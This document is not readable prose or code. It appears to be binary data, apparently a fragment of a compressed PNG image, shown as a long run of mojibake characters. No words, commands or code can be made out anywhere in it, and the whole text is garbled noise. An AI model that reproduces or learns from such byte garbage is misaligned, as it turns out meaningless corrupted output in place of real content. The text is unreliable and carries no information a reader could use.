           Ÿ‡Ï'6ûTäöm'“ÊvL4Eþp&®(^÷§ÆUäGaD[`ß"Ò",ŽA>"ƒt’ß/"&	qï>NÑ;÷~K>>Dc·s`âì."-°¿œÇëáÇ£DB#…Ї Æ<&åHUb݆û"‘‡ýLßÒ¥„pŒ¿ŒMËFŒXúÕ›X2|8-ö%-ñ•è¿vüö;;~BfЇÙêcò ø„cÞØö]1l$EÖª/£ANNÂ1&ßÐÎbŠ—£„›S
          9]ºÂÍS2n›—ßòÃjŒ×å&¬Ú#š*ç®qÛDåþŒ_a¢ÑÞº%¢“D1¦juDáOÁ‘#Gû÷ül‰òõIŠ˜ü…ñw…¸±øÎ"‡/ûs<Æê³iS§Q‹fÍ©,sAp8pGlž¤¬ÃꬆïÖ)Ë”p†¹„ãX>lsîÇÀŸ“SR)%í¦ˆ0oŸD›Ã¾[œíQ c΁	:t¤­[¶R*ï;•ÇàÔ"Þ*ظn/]¦¿þÚDÆO ¦Be˜û
          ^Ë×b7j=ïA	nÌsm­hÃo=²pŒïà¿ÇÜ©Ó>÷gŠlBÑH…‰ g;‚øÁí+Šûë˜
          þ”Ô³/eìړÍI¹m"Bn£?õ’›¯jhŒ=ÝÜü¼õžc¼=ô—tã¥7Dyé='!ÈAþ˜jhÜ&±B£$5މFˆtU7YA	æ"Š^DԃKXqR¥ D?cu)%Úú¿(÷ü ‚¿їZ‚1€•r€X?g
          {»¦@[>ÿ\vMœ{"·Ì	…¯Š@¥B…¨gá"ôµ½-srü©("ù|÷;ëÅê»rt18*`ë7ï%•ƶßñïwƒCŸçý Šøw‹(òŒôn¦±:[	¢ú×ýÙ:Ð`‹]aêS¦´ˆÂ>°y³Hÿ‚±ˆÆðÈ6Þºƒ"F§¨z¤6ƒ~iör¶%<GÍ+ö©ñ?¥´ŸÓ-þÏ1	Ìmó)*~dÔ`¼*7aÕTSíI1¾1õŒnžћ0)Mß¶ƒ;÷ „Ò¾”À7øu&M»ØéÍtÐg‡¾âÀÚȳ|_”-C³»tíËçÏGóè‘÷#Ä_Rn%•DãuD(=r”þÚø—ˆûöù‚>hØH|Ei… A¾A”M¾•©vÍ·©aý¢øG»¶í¨Çç=hؗÃhâ7iÎì9´xÑbé<xèÚ¥«X§`¤ªèÔ±͚9‹V¯YKk×®_Oøšö@ÛwÅ ÈïÖ­Gµª× ?#U*W^‡45dÑ9	~~×GY	á¼uËV""äøñb`—”L1ÜA!Zï“}1CªT!„,!îÈ%¢ÇÛ9Ò:':¯ÓS‚FO‰Þe¤ë6ˆ´(Ü« cATÇ^ÆP†*pªöD·EDÃ0°Lõ¢ð£l·Î_¤ÔÉÓ)þƒO¤Ü®!æÝA¤qZ½HAVºy§-¬SúxzŠoÍDĀ툂œQü9"-…,#Úd…ëf:jE±9ä.ž"ÚÂZ”…H‹h_<G¥çiLp»ðwAjˆØ>”\oƒíì‰>Çǁèg%’Àþq,ȇ‚|;™à/g?e{ ܘ¸Tºõo‹¨Œ7^QÒõyéŽke­xpÒê…çÉÂç9 ²/Íïߏoß.ÒZ íNn÷cìW‰î¸x™Â—þJ‘m,]¼¼ÕÑ“|²Až‹XbW»>¥|7E¤Dɑ‚*V¿ÎP£ÑTÁ8wŒÛà‹Üí­[ÑH…%'SÆÖí”Ü96åX:sPŠûþmŸ?‡¨â°
          ›¤åΘtÁ6ìáïa›B1ó5p…ÝO°Uø Ú"±»dñ:~â¤H•ƒ`káXá¶JD/„e¼víú
          Á±æÏ_@m[µûÍm^¨üž› ^Š´iéڀ롤qÃ±ãø”ã·Š‘ª©ÖÀ™±2­dÑb"ð×ÃÖ¾EpWV´5âï=F¤Å¸Ìœò±…c´|Ç.Š:‚"k¾CÑÅ%±y®­ÛÚrc;¸‰šI!](ý·UDwi>ÈèÎÐóSµÖÆ#šÏ«^^^E½õž=±êÍK¯äö°ÇËÃð…§§§š3ú!ŒÛ!V»“þÀ@
          ƒDÇC¤K›÷3Å£¨.&ClùQ<Çd	ÄbC	Šüè3
          Ÿù£Xé$îðä¶µu=
          ø7á£c؟`r~3ûƯêÖ¹-3—³ævðVðaÁÁ‡™?¢–ǏŽ:šÅœxsJð[¼÷¨Wáǝ™G"¸n‚½£à«£ìD­'D CCQDi[¿ñ(Pc¬.h¬Ldþ*	Ɖ¹Ë_?Êþ_LÀÍÿY䉏.ï'ùQÀºMèŸÁW‘¢‚}nòW£)óØ	áCaÜF!cER§ØËMY5ÕT+Hã{óe¾!•¥Ó{ÄÝʖÅÁÍå¿SRp'ŠcrÇ7ýu&KX61ÖÞAä$VæptbyÄË/Q{“˜\6jß»W,Àû‘Ý} hˆçß¾tùŠÈw†\¿#zãoQXnÕÊU"¢¡
          “kˆ¿XºçªÑ
          Â
          XD70™G´,އX‹%rHû0vÌX!êb)òßàýcß È ¬Ö„D~û¶í4zä(ªûv-A†ñÛ ÜŠ`ŒAÂòå+Äñ!Åíðà7"™tã|:,"1–-]F3~˜A#¿AíÚ´LJcÅà#'Á.(` ¤Oÿ!¦¯ZõGv~ãØ¤dD魛9“¾nú	uÕ{ˆ6ƒe3hC€Ôy¾)––¯„päÈ$†Û^|©Š”ôYkJûqe]».·Rѱ —éÇÛâ¼U—°¨V`Æm…D°tzC*Ȕž.Äâ”ï§
          ±Nʉh#…Áë^”b*úS8FONŸ)
          H¬^]LÄ!͂ùß",ð½t?(÷–¼ážÃãEŠÐ8öí(²Uç.–å!zQ¾éîÅ(±ßÙC^\ˆ¼øž­ßX(¹Þ ü"þag)Z…@¢]¼ÄòA,#ÄrB,+ìÈ_!Ü,\ãÚ<D±Î×þGt:þöÛ´ô«¯èèî=B0Žb«„ûQQ	BŠâý½EDGÕxG"â¶"„”9~=¦R%õîO™{÷‹¨·WTþ‡hŒhN­Ü¤U{HSãÜ1nƒ>Œ¾ŒÜ<㸁Ró¤ô?7RBÛ`Šñ,is…†xŒ× p°/jø…#ªøÐ±ÂM8~…›|€Ç"ç„àKÌ!ƂÏY‚Ì4{ö‘Ç\9‘¹RbrŠ˜tGDÇhǎ‚S!­Å ED3‚ÀY±ï‡ÙÿÃB‰4F›Fš‘b£[wúnⷂŸnÚô·¨µU{8~eNâ㇘‹ÜÍ¿þº\hÔ­]‡Šyû^ü0ü5τcˆÛhóñðy‹(’yf´W)iÂ~Ó%‡/å6&RTð{	Mš‹MQkCАCª,«ÇíV„}<{¢±§Ç'ƒ!ØK¯oPÔÃÃÑÇòûªý‹q;,Ĩ͘ÂÈ^Z„¢âÉ#Ç
          ±N-S&›­Û9 ~Q~Õ(âó>¶b%…=/ç|Í„{8–}„Í¿ýF£¼+Ɖ¹-[CáÃÙ²Ì)m}öQ€ßÆï))ܰÍÍßωv¯¿&ÐÑYGÃjցZÇvíÎ[þŠßŒEcÃ6o£ˆ~ƒ)*àmnGE¥þ8gû‚µ“RòÅú¿MÉÃFÑ­}ˆÒ¤b÷Ü^ÓXíŽT?(†§¦úQMµ‚4¾	Kð
          9„·ûx›ˆå~¨Þó÷U”ðY+Jä;ÞэÎ8ëi…“3àz'9’KIAbCÒàZK›~B[–,¡«W¯
          ç$–˜ä¢sR"‰!Ì>|DDè"×0ÄÔÞ={‰\¿ˆîEî3è@þáßÿ@¤9‡HW‰lðaòéWÉWD3iÇï,^¼„þÙ»Oä±T„aDH`߈žÀùXC9.Q[6o¿S§æÛ6ãϙhÿò˯tòÔiq.JD‰õob?,@Çþñš(p2~½S§nöïâœlì‚Î×Ë‰ý-(p-!‚ãZ‚ MÅÞ?7Ќ©g±bd~Sh0+*ÚU!±|¾o‘""/ég‘žÑÆñ<L›¿HLh a>·Ù›Œ³Œï¸
          ûÊÍZ5ÕòÕ¸í¡HCÆlFöŒ*«'
          J±ÆêBÀ¤	ƒÐÄIs'ÅÔkD‘ã'RØÎÝtæàAZ9e
          
          ®QCŠz}ñIд"†¹…ÐB|mUè
          ­‹ÔÓ5¢ø"‹O»èO~±Bmn
          Æ
          IG!=Qˆ÷ƒ\Æ»t"·9–
          â=,#D„4|Džnîπ.în<`i@+&L ãû؏p³+pÁÀ1€üciõÁCñõw‰‚5>eä6"ää	‹X&õD™[w%%‹¶Êí6“±Ñ„ŸªýLŒϸÍ!€Á•â7ûÑ.aYÜÞ±tU¤ó)í+Äb!ÃwZ·q¼†›åŒԑ™+HŘøž…Èñ÷-¸&¼Q,-7„âœÀw!œb[¡l9!cÅÚʕ«hÕ«	«µ†NmZ·ɈÊU8¶ø^~r@ìâ­)
          >c¨Ìüúcæ{ýû 3fҚÕkÄJ¾ŸøøÁɑ“¸¨ÁS3®™­ß~ÜK8©*®J9ŽÁ5mý—÷Ä/ŒWÎ] °•«)¢g?Š2qŸ-Úú1¢ °i<Äj!Dh¦NžF·.d/(‚/=ÍÂ(ÍP—U«–ïÆÍðeÆÛÜþñ6í’nÞ´J1YOZ¡ÕG9ý¨Ü¾‘î*ªz]Š<œ9é.)’”ùF^òŒuÁx÷Ðøy%?kPøkg7æ¯ï¾KËǍ§ã‡ç5ÅÄ[”4!vä8…OŸEQï"µ)øÒœ¼xÎã¡ìZ?§Œ»¬4G2VòÃv¼u–›¶jª©–ŸÆ7 BÌ;2nók×)uÖO”Ø´%Åó
          ¥õ óN®"ÚsH;jÃvE(⁻ˆ}õê[®,Íí՛þY»NTçG%ÎǪƙÖB1
          e øÒT,W^W‘×—É+ˆdN(¤d9äFÎ7äOC±…‰(d%÷.„Mˆµ#vç†`l8ž8>žÝ»v‹¥|(r‡<È8À©.h`PsÆRÕ?€ôëOþ¹ž.^¾Bq‰IËç„R`VŒOC«WKÆÑ–A‡DãŸutÈѕ û”¡¤¥Êÿç/È­Vt,§ƒ¨¤®tÕò͸ù½Â1_̐
          ‰€˜#Ïæ¨ñ[µ¶4“nç|71)ǀ”Û5ˆUä·S(üð
          ON¦ׯӚ?ðýQ]ÜH‘W‚qN(ÑR>µ7©{‘Â4ÌΎ†ÛÙS÷ÂRALÚúî£@êO
          ‰¢$_ð=ªÒ½x‹(â îs¤	Jé3¶¾ŸÛ@ú
          îîMø¨	ý1e
          :xHäÖ{bcǁ(¹h9EÅâ¥Õ¬
          E{–”Ú–-‚΂G±²¢òƶ¢½Â¸ýF0~ç‡*A3¸jxºëÿ€X\œá¥×ï7m}||ޒ?¢Ú}ŒÛ\1Æ@ÒM%H	tó·?(þ“<°äÁ%Vh [ûQLÂx½¬EvêNák7P–K?ÂýŠ	{À±bmþ¼ùÙ©°ºëq…âœP„Xü.ø¬;óF™Ã*¢2>“Ÿñ¿Çb}ìâxùX½ø=D>øVôá39¿ÿ¨Àoáz`àô
          ™ôÝ$T1¸88¼­ÿöž@Á„ã­;)¢¿!çÙì/mLôŠ>ÝÁâ™“¦Î]@Y¼O,÷綛ÈÀ¨$7oÕTËã6÷÷áuy;•qYê܉2¤¤/RL¥*Ü~­ü¦U›õò*¥¨FQøŒÙ·SPàžÊͶÀû‰IJ‚ñžµëhb³fÔÞÉQp2%…¡-Φâ6”rÝz߄ùëäÉÌ_æÅoc’•÷vâ$…ÿ4_J›V¦²4™á8§E1<WŠõ­*å‡ß¸‰ˆÿÑl¥@†õ5A5Õ
          ÂøæÃ’?$ÀßÈÄ<‰ùòß)¡Ég” 5P<óãÎô³“TH¨=‘Þ1ƒÅN)¸HaêW¡<ÍíÝ[ä¨Urä<¨ÐúoÀïˆDäEˆ%Xˆ¾ÖDÚ©ô–‰5-„[,DA:D#×ðIˆ^>^ÌÇ9æÜŒ•K$wÐgϞ£Ÿæü(òÇá÷P äI4؂2ˆÀ9cÐЪyqÍ/\¼$Îé)@
          N<D¿ý5ªÿur։HJ¤7Ád„$"½)ªéNt@ç!
          .&0™‰oð!¥Îû™nñ5—	z*ã$c<£œÜÌUS-OÛZ!&0‹'1.àÀ2ºMÌAŠls/IÔó(NQŸ´•†Ã.^¦0:¸Âßmœ;—†ÕªE­eÁ¸ È2îCi9´ÍKÑVºç¥ý(ûÊËýÝðA |îãM“Z¶¢õìÏ=&&A¥‘Ó_8ø¸Bcc)ìôY
          ÿeEvþœ¢+H?t¥ÝÉm/› W®FI½úQƦÍÖ=ƒ¥€¯ñKjNã4oï*^îúe>Ï[E%Áx·^¯o¦.£¾¿qCÎbÞb¢bÚ!,ëF(¥ý´€šµ¡˜R¥"Žð™ðŸÖmmï!nø(
          Û¼•Â._‘R·`2ÅÖ=sˆÕP|O!
          ėC¿¤:oשÀ7'BöA ˆ°Ö°õ¹'ÖǬˆÛyyüàþŠxï[¾‚H!·~ý!ã?|hNAŒ9e(·»°)üÛ)õÎûbõhc9ÛV>¥)®¾ÈpîŽ@¤§èÃðá§jÊ4Õòܸ¡€}5nsóQh‡"€áÈ1J=b«ÕÉNpW{V"êÙ×F6o+‰ÅÌ{ĤKãúû‚÷!cæÀ{ù^žÒ®Xé%ФC0FZ6œ-'îXP27ð¨ç ðׂ¿¶¤
          Ì_Ïæ'
          dá84ŒÂ_M‘!]¬‰ŠûX·=<F Vű/M´t¢Œ-Ûr2 eZKÆž2mèv¾!…uAz—*AŝüÍ>xœŸÐšÚ{£ÅÍÙ·¹£Oý®jjo|¿ÅøŒ±E܍0¾©oÎ_DI-)®Œ¯ åÈ»Òə‹ÈâÛK!Z@À€h<´ZUúí›oDô•pL¶¬Þ¦y@\„‹‚ëÖý)
          Ã!:XD°2„Œâ3J
          ŠZ5jŠ%~ÈGŒÜpŠÐkk߃܌ENc²“Ÿ5k¶ˆn!Ñ'ü;Šþ¤"=®A©bÅéƒ÷ŠJ׈–)*âŌçÕ˗é¯ùóilÆb¢í+R1<DS*ŰuˆÜ¦](”Ûf|Ñr”ÔècJ™4•n]ÌÖéбìgtà‡:†ZtDµ<5nkFЉ\edÒÍtºuò4¥|ý-ÅbÉß½"‹!Ñpí)|ÞB
          ;~JŠnâû>&1‰"øÙ²t¨[—Z¿øµd÷­FWä°j„»W‰4=$X¤Y:ò”øOà³rúë' èÔqÿ¾v=Ew¢è(ù AÐ¥ýÉÏ£˜¼Ç+O‰»SÆÎÝ"§ìG¯1^å}†ZtäÍÛÛÛÝK¯oîé¡ÿÖKo˜å©×÷à×JËo«vã6æÎ@
          DEsîÒ׬¥øÏZQ”³§ð¥w´ab úbU¥EôBaÛwI)(­¸DFÔ¤GA­‰&4&­½9ÙÙç©ø©âрÿDëàHþê×{G”Fø¸ˆØ6€Ï‹T?‰¶ï EŒý†¢ê7¦hïÒÒ/¢­Û ÷íR¤±+Å¿÷¥ý¼„²¸—s£8óÆPv«%äæ®šjybÜÎPt¹ã+Æљ³e9*R£ÅøU“R£Ý+€A.n‡UJáK—SØÕkÒd4ßGâK	¼ð_MØô7ÍìÔI¤.´¼õ–,¿n“³Y:P£Eëý¢¥¼53Þº3Ÿp^Cäö…}JÇ)¨É!'€ÇÊÊ:¨'?¶õ{ÖPãž%ŠÓ4‹…6/ZLç
          ‚¿ÆÄˆö†Üö«äT?hƒûÜ/ÁX]ÜdnÙJY‰ÙIŒ_ùa]Ɠ;ùVsèKmK8ú·7kýÍ34Æ µ“ù/­)Û?òØgÐZÞçr­ÑüƒÖØÙ1 ¨¢›×ä£TMµ7¾Ñt|Óa–f#7"¥¥QúÆ¿)±•™݋QßȧtzZ⨣¡L’QM_8+8/vBpD4N"•À’áÃèØ?ÿˆ¨âhvò¹Ý© "=¯Å> œVªPñ¶pjƒ@Ú> —q»Öm©ÄoB¬Éš›‚1®ˆŽàNúUPPÛvٹ딨
          [çø$AY.ˆsÇ֋ÛXɗºwíF®ûSœ#¢»A
          •~öøqZ?{6}Ûì3±Œ¦õ+(†÷2r›C§ŠN°WáÂ4ËAC‡uσÇD^DÃß\±RêT%Ÿ%RlæmwÞäf¯šj¹jܶÒ«4z1ŽÁÂ2ùžNújÅV¯+yb¾l…]»q›˜3b“S…?ÝùûJÝ ¸Z>_0Æÿ9ð5VV:|Q¦4Íéޝv®\E—Ξ„°ö×OA‘rq®ZK½˜ #6È9“ñ»	:r3A¯R‹’GŒ¦[
          >ÀmÁMú'ÞÈÍ^5Õrݸ}¡Xh¢ÚŌEVt4¥ÿ¶Š;t¥˜
          &Û9‹±¤šÛ/|iT­ú>n"…íÞK¡ð¥J¤¨­{ä_n¢¬:C‘¹V-Z
          ΅[žÌkž&Ѽ\LáËࣞ°¸)^Çä>¢uŸŽ©çˆUw8¤¦˜?àáàՏ$r?AaÇOPø³(ê½&R__jÝ"Å#¦DŠoڒRgþDtgqæŊ$uIµjybܾÊ2Æ1¢/•Ò3èÖõë”:c6ÅÕk(úzÛ²€WΏ"Írî÷'%NŠ(Ñ\×ß¼/è	ÞºæöîEý*–§{!6y‚*€j#íh²ƒMå1ãD{Gcç êo²³ŕ{)BŸó˜²sá·¨=RŸñ÷þMXÆoÿ›°lKÆïä‚ñÔêéÈûïÆÇѓŒXÍ
          Ýõ¢¾áãž&ÎÁ‰Fóñ!Vz¿%¾«Œ‹ïÿ¶Â_{3Õµ«(xáìقá¯h;˜€‹Š¢ðuë)2;}©¸ÝåçQ.žS¶2%}އ2PœY6nÓUùé›r³âÌ×7äeMµŽ^N~æ¶Z˯ZSp„. #9WéDº*Ië" Ëk(û3Çjýƒ×iü-Ÿ;˫±jÿj|ƒ)KUPÅ_ʵɎ9só6Jî;ˆâ5(Öѝ®Ù»Ð+
          g‡×Š'("‹_zQˆÆC«U£•ß~KgŽe§!¢ŠÃr1²X"m!‚`üÌìH[ä‘	¶E md¨ÄßUcü&~[T¿~Ì1·cåù…iýŸëið€T£jµlrÿ¤y2ðX'òK£@þ³ÿç|ðà!ºÂDD^ä˜ãëaËd®ó@oóÂE4¶Q#2s'ŠNOÉY¥tÞèLsr¦³<PŒäb\y%qtó×ߤüqlܶ‘óh5£>C]Š¡Z®73/n[XjЁ`<eJ¹6Ó/¥8X
          b^Xw71‡è0ŠlLá?Σ°c'$R.û!1a¤ýX½š¾þø#²ðý€UB0r’D¹¾¾È
          ÂÝ·Byšß¯í[¿QäæÇ
          š'Z0²	z4…¯YÇÀö]´¬'¹U›T&4<ŠQ¬MJ2œ2¹=*Æmû“"ÞüT]R­Z®·+äÚDJŸoÒZþ¬,ÊØý%vì&ŠŠÙÌŝÝn‹R´±:Eö@aÛvJQÅÀcð9ø_ðBàè±ã¢p[P»@Á;Áãž4†cÐ®©stÑЈ¶Õ98
          Ή|ÚåK—!£oeªÊü+ôÀ)k2°­PE¤j«T¾<•,V\Ì`ñÊïàœÁïÀólCAç‡Ú%¨hüþôÍ×߈ℸx¤”ÖÀwQàEE÷Qã)ª^#±dZøÒœ‘Æh£Üïc›Ð¼elØd]ñ?ŒÍø©Nnþª©–+ÆmJY9ܚ‘ÒçGS&O¥ø÷?’8€X‘aÕnáSÁÀIÝ}¤ÔhK~¡0£	>ŠI“ǹ‡ð¿r ё;éçAƒh°€RDatFNֈ´Ð+PBñAg=¥¸¥tæ6‰¼áó½Áç{Öœ9h‡ÎÖkÝh…Æ…~æ1åG
          }gï$„eÔêlgGx¼Ù§HêQ¸0uåßíðÖ[dÁ~äZNŠlKÆq@îU¸ˆ‚ño})Ád!EݗiœiÆ•¶ð±ìsö “.ºâêEQ|¼8nœC<?¾È¯ýáäJC‹Ø‹óľr^~=›¿–/Gó¾èC{ÿ\O—/\¤ˆ‚â¯J¤ñÙóöûÑ£/EU–#1é«´G€ÿ#Lj eJÜÛïˆUÄY((šž?šÆ@AQˆÆOAêIzÞ®rOwÑҜ±Xk
          ¾¦ó¹¥è@:ÿö¤5Yòbªp¬Úƒ÷ˆˆ+ʀÈqTêN°Tå8%÷BI•«R‚[QºÈÉŸŽ:1³…ܱpLXÒю4ÐÞÁžúWªDóúö¥ÃÛwP“sDÂ=1»â¸ãÀòÀC‡Ó÷ßM¢O>úX_Qxäcj`g&–HI1jÄHÚ¶m;]º|Eˆ–zmíûa‚1®!ÎDwÛÖm¢XÈ=Šz€Ä¶Î¯ €kŠãÁ@‘7ø/ʔ()Ž÷ã›P„(€W¯^Ë>/›üä8Íÿóªï'Ó¸> .îîÙKkݎâ[¸ÃþÊޞ–s=£ÓS¢Ö“’J”§ÄNÝÅ S1nãç˜i¯ÂOŸØ™È‚6''§7½¼¼ŠêõúZÞC㢞žÕÝÝÝ]ø-5oé=ŒÛ”·–‘%Ú[XÝ\¼ŒÛSL9?¹6y‹Çˆòtö¤¨ÆM)|îÏv႔cӚ˜óV)ú±wݟ"YG–Ú¾ö¿ì	›Dñ°Žxx‰§¹r®|}11Š	«þ¾¾´dØ0Ñ×Á‰”K¹Ð_ä9˜œ‚~ò´(„Ù¡+EW4IC¤CÉIЋÈý½&tsὯ°XÿôIDATRâNWY±ÏØÊèÉÍÜK¾TS-WŒÛ"â0ø;ÃH)}Μ£”‰ßSìÛïÞ;"ƒL,_EŠ!_QئÍÆÜKD?BÎb[P„c¾Û̜nØÐ/©^í:B€UT[Ü(¯î…}ƒÓBÌDŽÐ1ø½wëÓ'MšP‹Ïš‰•iŸwëÆ\ô+š9cý²ìZ»v-ýµñ/Ú¼éoÁS±EÎßßûæÍKߌŸ@ýúô¡³…ZµhAŸ~ü	}аÕª^ƒÊ—)#8Diû-¨hd%8ûGaeðÍÕ«×Ð¥+WÇ—+c5×CEzŠðo¾§¨:vÑ­Û%ü(Ú¤£Åú× äCè
          ŠòøˆÛ6ÿ‘W¶ŠÜüUS-WŒÛ”–4“‹¡à¤båðú"ÿ»H郜Ř԰ö£à¨È‹÷Ÿ4§ðï§QÒKB,æñX¾‹Åï+ODtlÏ?´läHúªvmêìâ,é̃sr6¤žßëZ¸0·w ÕZW:ÏçïV4[,Vˈ€+!?ƒÏx=ÜՇ.¸xÒQíÑyÐ&­­Ò¸Ðb'gší¨¥ïíhœ£!.#e!ÑÀ‚Ñ8ÓZ+mÕºÓ~g½‚¯ºJ×?Á݇’x_Ø/tö‹ãÂñ8V|Ûdþ>˜cšƒ†ºðy’¸í]üüõe‰¿ð­D‹†õ¥®±o,PþŠ1ŽÜ¦Âûƒ¢ZR´g	‰“æœƤ&7Š–¡¸RÊ·Sèօ;ROîb´b`Âù©X±aoìêf[8¹KàÍ+¨Â±jd|SøæêÂø‹‹Á ¢‹Ó-¥ø÷>¤&?qEt´OçN“Øáa™Dö€[@³ê_±-2$ÛaÆ*/ÈÄE¤-a_Ãd°cH{ªP¦¬ ‰ ®J”1„X•Øb‰Š ùõêÔù‹·ïØ)H¥Äò±c”@¸p,ǏŸ éÓ¦òïâø‚”ç®;ÎA¤™àóÂ5õ«XIäC!Â	<ØX»v9{N´p}qMð?ÚºfÖ@”1Eçùº¬™:¾¬YCÆh{hƒè1«ŠÇãìhwÄL¢íÆ×®O©S¦SÖå«J¼dÆÆpFIù6P-‡ùèõ½ô†Éܾ01áí¡?įÕªþ6ÛÒc#;G\Æ?û¤ˆ8Ÿ2¶#â”â8Þe(ªÞû1b…ñw¤\›	ws~Œnˆ²Ø·q#MåÁ{7ƒA‹eÜAïE@ET¢#^(˜·í¬"$²—Þ10Aø Kïò
          )V„`£²ÌÏ:Êãvt‡	‚¥{ˆôP¾ûÀç‚ß‚ñK4Ðd¤åãÆÑ‰ýèÆP±’&7sôçОàw!c °h	E5ùLŠÊÌ:äöɃ£(,ëçcLy#%š;Rú²”)Ú6·sDuüƨÃO_’oÕT{dãvô<ãunSŸ2¶£Á².^¦”ï¦N*¢‹mFıoÕ²õ.E‘í‚E½(n÷˜‘Ŷ ðPð˜Ë|­Y³–úöù‚jV«.8™Ž™ÙâK¹	pZpIpAì“óµ™_~öÉ'ÔµS'!ô®[»–.œ¿@É))òÕ||ËÌÌdþF;vì Y3fð¹÷¡6-[QýºõDÄ5®ø ¢|Á¹m{nûÀ5ÇÓ(`½lé2:tAì—”o>Ц¹ž@a[¶Qd÷>UÞ$µEøSkÏ÷¢kªAIƒ‡Q&óyŸ­btf¸ðS՗ª–+Æí©2c&#”q‹’’éÖÎݔ<hżMQŽ<VB°‚5'ÅcˆÈ~ïF>å
          ;z\jó¸‡"sù>zPðý†à!Æà]¿ó
          iøuñp—ŠíÛŒ•´ˆäë¨£½:=]çóS„áìs~Xˊ¸l-,+Àëˆãý„Ë×B0Dç{	ÁÊo9÷{?(¿	Ñy‘“³H«qÏÔÙüõeh4Ò/cÆÐñ½{éúË_áG1Á;r”ÂgÌ¢¨í(ºLeyâ‚a}ÞìW1ÉÅ ¾YJ_¿IDË~56æ2š0œäÛà©0U8Ví‰6¾¿žç›ªo—ò6YÜqì4Ò_EÉ»S|¥*Á7ë)ZÎÎËþ•Á¸"P´ûßÿ¨£VCß6o.–IG²C‡¨‘b«-(Eß ª.Z¸ˆ:´ï@~•|…ð
          €<–ð)š½ÔȌâjxۊeˉèä52h°3/^¼$ˆ¥ÍH×ǀµ`¼uËVÅü ‚±"®ÆÆ'ÐADROú^Dv”çó·KÁD²>O±ì¯R¹ò"J»E³æ4xà Z¼h±H3ÎÿÎG¾m]§û¿‘˜,ÚÕámÛèÇϻӥKQ°]a‘·ªC¶@æ31ØÏmö·ÝøÒ•(ù³6”6ge]½#wÜFC~¨.§¶a>z½¿·‡a!þkE0öôðèRÔÍÍUþˆjVÆm	y‹û3ö0Da›Ð0Jõ#ÅÕk$œ"9RQ ×&–ª:¸RTµ:1b,…mßI¡W®ÙεÉ÷Vmˆ¢o¦Y]ºPï’%DAÈËá¦Â*€eqƒíìE·EN:Zªq„z²!ñ¿7ä—ÞYË·óºÝcX•¡|ß¿—¬ìŸŒóÁʗ^|-D¾7>v,ói琽ÌoŸß2îǖ0°4±/Ÿöw±¾°ß_Ëú†T­B«¾ÿžÎ8)MhÁ·å¶ ‘W€æ6„I‰°={E»‹¬×¢1©¡L`X‘sgOŠa_šôyoÊØwPr¢lÜÖQí£?U}©je܆ì¸-ÕcLf\Œ})*£'´±ˆåÑÑönwŠq€X꥔>-)|æ
          ;|TšÁ`ôQxÇ@# qîÂEZ±â7êÖ¥«Hå ¬´ÊÁœѼøm´ï7x:µoOÓ§N¥ýû÷Sjjª¸tùmçΞ£%‹—Ѐ~ý¨YÓO¯E@yÎhë|8phˆåàõH2wî<‘2ÿ¹Â¿mýw¹,©ŽŽ¦°Óg)lùJŠè֛¢*W•Wlp;µn£Ü÷ƒ@ ‹oÜTÔØ ä8QøQTû_ÎhÃP9Ö¿XñâÅéõzƒ§§g1¬|ÓjµoðË/JïªÆ·â‹;F;nOÙK,oq;M9–âj¼s»–FÎþ¯áqEŠèÑGL†ˆàLŽä‘}P@,Fq¶S‡ӚéÓ雦ŸPw/O!cÅiNΦðÒþÌõ3Ï=âl 07ïlÁ7û¼s	ÖÂoNØúüãBŒO¹¯gï(ÆàÎw\+þ:¸J­üî;:{âóV9uhD<€;áávü$…O›IQï~ ùQL^Ü1n’kl`ÅFÕڔòÕhºµŸ9)÷yÜÖÓ—ßss¯ ßO•©Â±jOœñ̈́ÜF¨@èâì`æÑc"oqRÅJpõ¡sZZÅí1öB0PŠÜ))º{z²ÓnJk§ÿ@§ÎN=·;%¢Â#Ä×ÅQóO?‚%H¹€F+Äc3“ƉßL¤Ÿ^Hæ/ )ßO¹r¿2”FEÓ¦MËԎó`_ùÍÜŠüÄR¤]¸~#T¤aÍû¯ûv­»cؽzô¤ß_)ò'$%SBb’H»qƒkù¯Ë©U³æäÃ$ß	·E ó ùJt6€çÊãr¥JӇ4BøÆ
          E´
          ¢¿qÞ ê¹uM‘_)œqñÜ9Úµj•(8Õ§t)Ñù!‡«”š¢w–…h(wšKµtJçA	<Lò)C‰í»Pƞ½r+BÇIÆ0*«N0‡5Lüß/Àÿ/	ƆƒÞå´ªY7§¸
          Õb ÚRšê£›‹—RB ”ŠÑpw¤¢ÀVɧ/N‘­)|õZIà¸WD¿¦ý8´mÍý¢õ÷­H!Ž,ChE*!ù@ž6änéLr“–¶)Kï"ø/ºzÒ1,½s¾÷Ò;Ë(āÉDµ(Ёülp!äâžiW¢}³ÅeY¶%ƒàß-¡~DP@eç]øBðr3­Ó¸Ò6›Xæ}ĒÏ„Z9·T÷bÈW·Tl{!‚+Bº­k–
          ßϋe}ÃjÔ ?gÍ¢«/‰>OY	q×ö¤"J._¡°­Û(bøH1i!R£`Ci§
          A‡ÐaçLqõ‹jÿXN-Ñ¤`éÀÐË·„jª=’q*ÉÀê¬J«‚NŸ¥Ôo¾§8¤¢ÀÒ~H1¨Ä{uRÄÔxÐ	ÁÛ9îÉ|¸/­£XOž<E™{bu
          úz3G_{\ÎæÅo„øŠßBža,]²„9ã܋¢ëyR,–ýâÆ
          hè ÁônݺTÜÛG?ø.ŽÿqÄc|W¹¦AªiS§‰<ÅàÚàô‘[ÿU®ý4Úúí«W)œ}#ÒJ‰èw[~ԑۨ£»ˆ2Nî7ˆnmÞF”€ÿîãc_:_ùvPín{¡„‹‹ƒ·»÷§ÌIñ=±ƒ·³===?qttt–?óŸ7nCŽÜ–>`Ìb\7dz†”ŠâӖR±P%¥uÅ$Þó­B]zPø²åvú´´R“#¶î|´…¾×Î;NæÎ¥ïÛ´¦žÅŠJE÷_}å.Φ¬ŽC!»ÚáìN×ø|•(ßìó~J”À1gÍäóWV‚-î
          Ô°â¯_Ö¨.øë•'‰¿Â—Љb’"¢[/Š*g”'1äÀåÜåÀ¬ÜŒ¯ÿ¥|3‰²ÎK¥`Üæ·1>æ‡ÿ“o‰§ÎTáXµ'ÆøfÒòÍԔ·ó×Ä]––F7W­¡ø?£D̂ó ñ€ÎCDcY§¢Žçjóҋ4ØßŸ~Ÿ8Q*rÇ]¯ˆŽ³å!i{„÷3ã‡ÔªyQ
          ±$´tñd	21d119E—9È]…Üç¦H¬ˆÏˆ
